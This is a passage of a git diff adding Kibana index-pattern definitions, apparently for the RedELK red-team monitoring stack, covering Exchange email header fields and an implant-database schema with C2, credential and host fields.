\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstripped\"}}},{\"name\":\"x-ms-exchange-transport-endtoendlatency\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-endtoendlatency.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-endtoendlatency\"}}},{\"name\":\"x-ms-exchange-transport-forked\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-forked.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-forked\"}}},{\"name\":\"x-ms-has-attach\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-has-attach.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-has-attach\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id-prvs\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id\"}}},{\"name\":\"x-ms-oob-tlc-oobclassifiers\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-oob-tlc-oobclassifiers.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-oob-tlc-oobclassifiers\"}}},{\"name\":\"x-ms-publictraffictype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-publictraffictype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-publictraffictype\"}}},{\"name\":\"x-ms-tnef-correlator\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-tnef-correlator.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-tnef-correlator\"}}},{\"name\":\"x-ms-traffictypediagnostic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-traffictypediagnostic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-traffictypediagnostic\"}}},{\"name\":\"x-ms-userlastlogontime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-userlastlogontime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-userlastlogontime\"}}},{\"name\":\"x-msametadata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msametadata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msametadata\"}}},{\"name\":\"x-msapipeline\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msapipeline.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msapipeline\"}}},{\"name\":\"x-notifications\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-notifications.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-notifications\"}}},{\"name\":\"x-originating-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originating-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originating-ip\"}}},{\"name\":\"x-originatororg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originatororg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originatororg\"}}},{\"name\":\"x-received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-received\"}}},{\"name\":\"x-sender-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sender-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sender-ip\"}}},{\"name\":\"x-sid-pra\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-pra.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-pra\"}}},{\"name\":\"x-sid-result\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-result.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-result\"}}}]", "timeFieldName": "@timestamp", "title": "email-*"}, "coreMigrationVersion": "7.16.3", "id": "email", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171860673, 15], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_implantsdb.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_implantsdb.ndjson new file mode 100644 index 00000000..a1f1a36d --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_implantsdb.ndjson @@ -0,0 +1 @@ +{"attributes": {"fieldFormatMap": "{\"implantlogfile\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"{{rawValue}}\"}}}", "fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.message\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.timestamp\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.path_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path_local.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path_local\"}}},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain_ext\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.number\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_ext\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_int\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.build\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.codename\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.arch\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.checkin\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.input\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.link_mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.linked\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.log_file\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.output\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.parent_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.sleep\",\"type\":\"string\",\"esTypes\":[\"keyword\